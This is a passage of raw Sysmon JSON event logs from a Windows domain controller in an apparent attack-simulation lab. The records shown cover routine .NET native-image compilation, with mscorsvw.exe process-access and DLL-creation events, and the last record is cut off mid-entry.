{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6751,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.089\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-0010272B0D00}\r\nTargetProcessId: 4340\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.089","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-0010272B0D00}","TargetProcessId":"4340","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6752,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:26.214\r\nProcessGuid: {A837DB8D-0482-5F25-0000-0010272B0D00}\r\nProcessId: 4340\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10f4-0\\Microsoft.Build.Conversion.v4.0.dll\r\nCreationUtcTime: 2020-08-01 05:58:26.214","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:26.214","ProcessGuid":"{A837DB8D-0482-5F25-0000-0010272B0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10f4-0\\Microsoft.Build.Conversion.v4.0.dll","CreationUtcTime":"2020-08-01 05:58:26.214","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6753,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.261\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-0010202F0D00}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.261","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-0010202F0D00}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6754,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.261\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-0010202F0D00}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.261","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-0010202F0D00}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6755,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.261\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-0010202F0D00}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.261","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-0010202F0D00}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6756,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.324\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-001061320D00}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.324","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-001061320D00}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6757,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.324\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-001061320D00}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.324","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-001061320D00}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6758,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.339\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-001061320D00}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.339","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-001061320D00}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6759,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:27.605\r\nProcessGuid: {A837DB8D-0482-5F25-0000-001061320D00}\r\nProcessId: 4120\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1018-0\\Microsoft.Build.Engine.dll\r\nCreationUtcTime: 2020-08-01 05:58:27.605","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:27.605","ProcessGuid":"{A837DB8D-0482-5F25-0000-001061320D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1018-0\\Microsoft.Build.Engine.dll","CreationUtcTime":"2020-08-01 05:58:27.605","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6760,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:27.667\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0483-5F25-0000-001011370D00}\r\nTargetProcessId: 3460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 